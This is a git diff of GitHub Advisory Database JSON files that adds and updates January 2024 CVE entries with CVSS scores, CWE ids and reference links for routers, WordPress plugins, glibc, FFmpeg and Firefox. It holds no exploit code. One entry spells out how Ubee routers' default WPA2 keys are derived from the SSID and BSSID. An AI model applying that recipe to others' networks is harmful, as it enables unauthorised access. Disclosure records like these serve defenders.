+ { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1002" + }, + { + "type": "WEB", + "url": "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setIpPortFilterRules-71c3f0a947e14b7f95fa19b7d6676994?pvs=4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252271" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252271" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T14:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-jcqj-vmgc-332m/GHSA-jcqj-vmgc-332m.json b/advisories/unreviewed/2024/01/GHSA-jcqj-vmgc-332m/GHSA-jcqj-vmgc-332m.json new file mode 100644 index 0000000000000..d733c68548f06 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-jcqj-vmgc-332m/GHSA-jcqj-vmgc-332m.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jcqj-vmgc-332m", + "modified": "2024-01-31T15:30:20Z", + "published": "2024-01-31T15:30:20Z", + "aliases": [ + "CVE-2024-22304" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in Borbis Media FreshMail For WordPress.This issue affects FreshMail For WordPress: from n/a through 2.3.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22304" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/freshmail-integration/wordpress-freshmail-for-wordpress-plugin-2-3-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T13:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-jf97-8p4h-gh74/GHSA-jf97-8p4h-gh74.json b/advisories/unreviewed/2024/01/GHSA-jf97-8p4h-gh74/GHSA-jf97-8p4h-gh74.json new file mode 100644 index 0000000000000..fedaca6816a09 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-jf97-8p4h-gh74/GHSA-jf97-8p4h-gh74.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jf97-8p4h-gh74", + "modified": "2024-02-02T03:30:31Z", + "published": "2024-01-29T06:30:28Z", + "aliases": [ + "CVE-2024-24736" + ], + "details": "The POP3 service in YahooPOPs (aka YPOPs!) 1.6 allows a remote denial of service (reboot) via a long string to TCP port 110, a related issue to CVE-2004-1558.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24736" + }, + { + "type": "WEB", + "url": "https://packetstormsecurity.com/files/176784/YahooPOPs-1.6-Denial-Of-Service.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T04:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-jggj-wjwc-8gg9/GHSA-jggj-wjwc-8gg9.json b/advisories/unreviewed/2024/01/GHSA-jggj-wjwc-8gg9/GHSA-jggj-wjwc-8gg9.json index 07e1e309caf9b..7a0f46ee78dfe 100644 --- a/advisories/unreviewed/2024/01/GHSA-jggj-wjwc-8gg9/GHSA-jggj-wjwc-8gg9.json +++ b/advisories/unreviewed/2024/01/GHSA-jggj-wjwc-8gg9/GHSA-jggj-wjwc-8gg9.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jggj-wjwc-8gg9", - "modified": "2024-01-22T00:30:19Z", + "modified": "2024-01-29T18:31:46Z", "published": "2024-01-22T00:30:19Z", "aliases": [ "CVE-2023-52353" ], "details": "An issue was discovered in Mbed TLS through 3.5.1. In mbedtls_ssl_session_reset, the maximum negotiable TLS version is mishandled. For example, if the last connection negotiated TLS 1.2, then 1.2 becomes the new maximum.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-384" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-21T23:15:44Z" diff --git a/advisories/unreviewed/2024/01/GHSA-jgqm-9prw-2qr6/GHSA-jgqm-9prw-2qr6.json b/advisories/unreviewed/2024/01/GHSA-jgqm-9prw-2qr6/GHSA-jgqm-9prw-2qr6.json new file mode 100644 index 0000000000000..352a4457e12f0 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-jgqm-9prw-2qr6/GHSA-jgqm-9prw-2qr6.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jgqm-9prw-2qr6", + "modified": "2024-02-05T21:30:31Z", + "published": "2024-01-31T12:30:18Z", + "aliases": [ + "CVE-2024-23507" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in InstaWP Team InstaWP Connect – 1-click WP Staging & Migration.This issue affects InstaWP Connect – 1-click WP Staging & Migration: from n/a through 0.1.0.9.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23507" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/instawp-connect/wordpress-instawp-connect-plugin-0-1-0-9-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T12:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-jh2c-2h3p-fcj3/GHSA-jh2c-2h3p-fcj3.json b/advisories/unreviewed/2024/01/GHSA-jh2c-2h3p-fcj3/GHSA-jh2c-2h3p-fcj3.json index 926caac72a0e1..8c2a4efefde35 100644 --- a/advisories/unreviewed/2024/01/GHSA-jh2c-2h3p-fcj3/GHSA-jh2c-2h3p-fcj3.json +++ b/advisories/unreviewed/2024/01/GHSA-jh2c-2h3p-fcj3/GHSA-jh2c-2h3p-fcj3.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jh2c-2h3p-fcj3", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-29T18:31:47Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-38625" ], "details": "A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central 2019 (lower than build 6481) could allow an attacker to interact with internal or local services directly.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThis is a similar, but not identical vulnerability as CVE-2023-38624.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-918" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-jhhh-mxj4-r289/GHSA-jhhh-mxj4-r289.json b/advisories/unreviewed/2024/01/GHSA-jhhh-mxj4-r289/GHSA-jhhh-mxj4-r289.json index 3ab89453fb4bd..0f49d858b4f60 100644 --- a/advisories/unreviewed/2024/01/GHSA-jhhh-mxj4-r289/GHSA-jhhh-mxj4-r289.json +++ b/advisories/unreviewed/2024/01/GHSA-jhhh-mxj4-r289/GHSA-jhhh-mxj4-r289.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jhhh-mxj4-r289", - "modified": "2024-01-27T06:30:23Z", + "modified": "2024-02-03T00:31:32Z", "published": "2024-01-27T06:30:23Z", "aliases": [ "CVE-2024-22860" ], "details": "Integer overflow vulnerability in FFmpeg before n6.1, allows remote attackers to execute arbitrary code via the jpegxl_anim_read_packet component in the JPEG XL Animation decoder.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-190" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-27T06:15:48Z" diff --git a/advisories/unreviewed/2024/01/GHSA-jhv9-m6q4-wc38/GHSA-jhv9-m6q4-wc38.json b/advisories/unreviewed/2024/01/GHSA-jhv9-m6q4-wc38/GHSA-jhv9-m6q4-wc38.json new file mode 100644 index 0000000000000..52197f5898e73 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-jhv9-m6q4-wc38/GHSA-jhv9-m6q4-wc38.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jhv9-m6q4-wc38", + "modified": "2024-01-31T21:31:03Z", + "published": "2024-01-31T21:31:03Z", + "aliases": [ + "CVE-2024-1114" + ], + "details": "A vulnerability has been found in openBI up to 1.0.8 and classified as critical. This vulnerability affects the function dlfile of the file /application/index/controller/Screen.php. The manipulation of the argument fileUrl leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252472.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1114" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/9wv48TygKRxo" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252472" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252472" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T20:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-jj7g-c984-hr2m/GHSA-jj7g-c984-hr2m.json b/advisories/unreviewed/2024/01/GHSA-jj7g-c984-hr2m/GHSA-jj7g-c984-hr2m.json index 8fa2291080e71..a5cdec42a681a 100644 --- a/advisories/unreviewed/2024/01/GHSA-jj7g-c984-hr2m/GHSA-jj7g-c984-hr2m.json +++ b/advisories/unreviewed/2024/01/GHSA-jj7g-c984-hr2m/GHSA-jj7g-c984-hr2m.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jj7g-c984-hr2m", - "modified": "2024-01-21T06:30:22Z", + "modified": "2024-01-29T15:30:23Z", "published": "2024-01-21T06:30:22Z", "aliases": [ "CVE-2024-23726" ], "details": "Ubee DDW365 XCNDDW365 and DDW366 XCNDXW3WB devices have predictable default WPA2 PSKs that could lead to unauthorized remote access. A remote attacker (in proximity to a Wi-Fi network) can derive the default WPA2-PSK value by observing a beacon frame. A PSK is generated by using the first six characters of the SSID and the last six of the BSSID, decrementing the last digit.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-798" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-21T04:15:19Z" diff --git a/advisories/unreviewed/2024/01/GHSA-jjfr-pq2x-mf69/GHSA-jjfr-pq2x-mf69.json b/advisories/unreviewed/2024/01/GHSA-jjfr-pq2x-mf69/GHSA-jjfr-pq2x-mf69.json index 5cbed3aa5addc..63a8d0a6b8b45 100644 --- a/advisories/unreviewed/2024/01/GHSA-jjfr-pq2x-mf69/GHSA-jjfr-pq2x-mf69.json +++ b/advisories/unreviewed/2024/01/GHSA-jjfr-pq2x-mf69/GHSA-jjfr-pq2x-mf69.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jjfr-pq2x-mf69", - "modified": "2024-01-23T21:30:21Z", + "modified": "2024-01-30T21:30:28Z", "published": "2024-01-23T21:30:21Z", "aliases": [ "CVE-2023-52331" ], "details": "A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central could allow an attacker to interact with internal or local services directly.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-918" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-jjqj-xq2v-c8jx/GHSA-jjqj-xq2v-c8jx.json b/advisories/unreviewed/2024/01/GHSA-jjqj-xq2v-c8jx/GHSA-jjqj-xq2v-c8jx.json new file mode 100644 index 0000000000000..a3df0253fc000 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-jjqj-xq2v-c8jx/GHSA-jjqj-xq2v-c8jx.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jjqj-xq2v-c8jx", + "modified": "2024-01-31T15:30:20Z", + "published": "2024-01-31T15:30:20Z", + "aliases": [ + "CVE-2024-1112" + ], + "details": "Heap-based buffer overflow vulnerability in Resource Hacker, developed by Angus Johnson, affecting version 3.6.0.92. This vulnerability could allow an attacker to execute arbitrary code via a long filename argument.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1112" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/buffer-overflow-vulnerability-resource-hacker" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T14:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-jjr8-97p7-vmmg/GHSA-jjr8-97p7-vmmg.json b/advisories/unreviewed/2024/01/GHSA-jjr8-97p7-vmmg/GHSA-jjr8-97p7-vmmg.json new file mode 100644 index 0000000000000..0ea5f993c1da4 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-jjr8-97p7-vmmg/GHSA-jjr8-97p7-vmmg.json @@ -0,0 +1,66 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jjr8-97p7-vmmg", + "modified": "2024-01-31T15:30:20Z", + "published": "2024-01-31T15:30:20Z", + "aliases": [ + "CVE-2023-6780" + ], + "details": "An integer overflow was found in the __vsyslog_internal function of the glibc library. This function is called by the syslog and vsyslog functions. This issue occurs when these functions are called with a very long message, leading to an incorrect calculation of the buffer size to store the message, resulting in undefined behavior. This issue affects glibc 2.37 and newer.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6780" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-6780" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254396" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D2FIH77VHY3KCRROCXOT6L27WMZXSJ2G/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MWQ6BZJ6CV5UAW4VZSKJ6TO4KIW2KWAQ/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-01" + }, + { + "type": "WEB", + "url": "https://www.openwall.com/lists/oss-security/2024/01/30/6" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176932/glibc-syslog-Heap-Based-Buffer-Overflow.html" + }, + { + "type": "WEB", + "url": "http://seclists.org/fulldisclosure/2024/Feb/3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-131" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T14:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-jjrm-h8pr-rf2f/GHSA-jjrm-h8pr-rf2f.json b/advisories/unreviewed/2024/01/GHSA-jjrm-h8pr-rf2f/GHSA-jjrm-h8pr-rf2f.json index d10c1b0069c88..6b720dd04c379 100644 --- a/advisories/unreviewed/2024/01/GHSA-jjrm-h8pr-rf2f/GHSA-jjrm-h8pr-rf2f.json +++ b/advisories/unreviewed/2024/01/GHSA-jjrm-h8pr-rf2f/GHSA-jjrm-h8pr-rf2f.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jjrm-h8pr-rf2f", - "modified": "2024-01-23T15:30:57Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T15:30:57Z", "aliases": [ "CVE-2024-0743" ], "details": "An unchecked return value in TLS handshake code could have caused a potentially exploitable crash. This vulnerability affects Firefox < 122.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-252" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T14:15:38Z" diff --git a/advisories/unreviewed/2024/01/GHSA-jjwf-q2q5-945c/GHSA-jjwf-q2q5-945c.json b/advisories/unreviewed/2024/01/GHSA-jjwf-q2q5-945c/GHSA-jjwf-q2q5-945c.json index 95b3403b8e03d..de8d7023d5fd4 100644 --- a/advisories/unreviewed/2024/01/GHSA-jjwf-q2q5-945c/GHSA-jjwf-q2q5-945c.json +++ b/advisories/unreviewed/2024/01/GHSA-jjwf-q2q5-945c/GHSA-jjwf-q2q5-945c.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jjwf-q2q5-945c", - "modified": "2024-01-23T12:30:29Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T12:30:29Z", "aliases": [ "CVE-2023-46343" ], "details": "In the Linux kernel before 6.5.9, there is a NULL pointer dereference in send_acknowledge in net/nfc/nci/spi.c.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -37,9 +40,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-476" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T10:15:10Z" diff --git a/advisories/unreviewed/2024/01/GHSA-jm27-8g8p-3jmp/GHSA-jm27-8g8p-3jmp.json b/advisories/unreviewed/2024/01/GHSA-jm27-8g8p-3jmp/GHSA-jm27-8g8p-3jmp.json index 49ce71bff9704..995ead1d8f893 100644 --- a/advisories/unreviewed/2024/01/GHSA-jm27-8g8p-3jmp/GHSA-jm27-8g8p-3jmp.json +++ b/advisories/unreviewed/2024/01/GHSA-jm27-8g8p-3jmp/GHSA-jm27-8g8p-3jmp.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jm27-8g8p-3jmp", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-47194" ], "details": "An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThis vulnerability is similar to, but not identical to, CVE-2023-47195.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-346" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-jm98-mxmf-qcjw/GHSA-jm98-mxmf-qcjw.json b/advisories/unreviewed/2024/01/GHSA-jm98-mxmf-qcjw/GHSA-jm98-mxmf-qcjw.json new file mode 100644 index 0000000000000..5abeb59efd88e --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-jm98-mxmf-qcjw/GHSA-jm98-mxmf-qcjw.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jm98-mxmf-qcjw", + "modified": "2024-02-01T06:31:05Z", + "published": "2024-01-30T15:30:23Z", + "aliases": [ + "CVE-2024-24330" + ], + "details": "TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the port or enable parameter in the setRemoteCfg function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24330" + }, + { + "type": "WEB", + "url": "https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/14/TOTOlink%20A3300R%20setRemoteCfg.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-jpj8-v3w8-6gx3/GHSA-jpj8-v3w8-6gx3.json b/advisories/unreviewed/2024/01/GHSA-jpj8-v3w8-6gx3/GHSA-jpj8-v3w8-6gx3.json new file mode 100644 index 0000000000000..37a148d56fc97 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-jpj8-v3w8-6gx3/GHSA-jpj8-v3w8-6gx3.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jpj8-v3w8-6gx3", + "modified": "2024-01-31T18:31:26Z", + "published": "2024-01-31T18:31:26Z", + "aliases": [ + "CVE-2024-22302" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ignazio Scimone Albo Pretorio On line allows Stored XSS.This issue affects Albo Pretorio On line: from n/a through 4.6.6.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22302" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/albo-pretorio-on-line/wordpress-albo-pretorio-on-line-plugin-4-6-6-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T17:15:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-jr2v-748r-frvv/GHSA-jr2v-748r-frvv.json b/advisories/unreviewed/2024/01/GHSA-jr2v-748r-frvv/GHSA-jr2v-748r-frvv.json new file mode 100644 index 0000000000000..b153304afa795 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-jr2v-748r-frvv/GHSA-jr2v-748r-frvv.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jr2v-748r-frvv", + "modified": "2024-01-30T00:30:29Z", + "published": "2024-01-30T00:30:29Z", + "aliases": [ + "CVE-2024-1021" + ], + "details": "A vulnerability, which was classified as critical, has been found in Rebuild up to 3.5.5. Affected by this issue is the function readRawText of the component HTTP Request Handler. The manipulation of the argument url leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252290 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1021" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252290" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252290" + }, + { + "type": "WEB", + "url": "https://www.yuque.com/mailemonyeyongjuan/tha8tr/yemvnt5uo53gfem5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T22:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-jrjh-cm7j-j4fh/GHSA-jrjh-cm7j-j4fh.json b/advisories/unreviewed/2024/01/GHSA-jrjh-cm7j-j4fh/GHSA-jrjh-cm7j-j4fh.json new file mode 100644 index 0000000000000..236195ca5dcd5 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-jrjh-cm7j-j4fh/GHSA-jrjh-cm7j-j4fh.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jrjh-cm7j-j4fh", + "modified": "2024-01-31T15:30:19Z", + "published": "2024-01-31T15:30:19Z", + "aliases": [ + "CVE-2024-1087" + ], + "details": "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority because it is a duplicate of CVE-2024-1085.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1087" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T13:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-jw42-5m4v-9c8g/GHSA-jw42-5m4v-9c8g.json b/advisories/unreviewed/2024/01/GHSA-jw42-5m4v-9c8g/GHSA-jw42-5m4v-9c8g.json index 5cc1eb5c5666d..fe896f058238e 100644 --- a/advisories/unreviewed/2024/01/GHSA-jw42-5m4v-9c8g/GHSA-jw42-5m4v-9c8g.json +++ b/advisories/unreviewed/2024/01/GHSA-jw42-5m4v-9c8g/GHSA-jw42-5m4v-9c8g.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jw42-5m4v-9c8g", - "modified": "2024-01-09T18:30:27Z", + "modified": "2024-02-08T12:30:48Z", "published": "2024-01-09T18:30:27Z", "aliases": [ "CVE-2024-0057" @@ -24,6 +24,10 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-0057" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240208-0007/" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-jx5w-px6r-88w4/GHSA-jx5w-px6r-88w4.json b/advisories/unreviewed/2024/01/GHSA-jx5w-px6r-88w4/GHSA-jx5w-px6r-88w4.json index 384edc59b83c1..9f84a05d01f4f 100644 --- a/advisories/unreviewed/2024/01/GHSA-jx5w-px6r-88w4/GHSA-jx5w-px6r-88w4.json +++ b/advisories/unreviewed/2024/01/GHSA-jx5w-px6r-88w4/GHSA-jx5w-px6r-88w4.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jx5w-px6r-88w4", - "modified": "2024-01-23T15:30:58Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T15:30:58Z", "aliases": [ "CVE-2024-0747" ], "details": "When a parent page loaded a child in an iframe with `unsafe-inline`, the parent Content Security Policy could have overridden the child Content Security Policy. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -26,6 +29,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html" + }, { "type": "WEB", "url": "https://www.mozilla.org/security/advisories/mfsa2024-01/" @@ -43,7 +50,7 @@ "cwe_ids": [ ], - 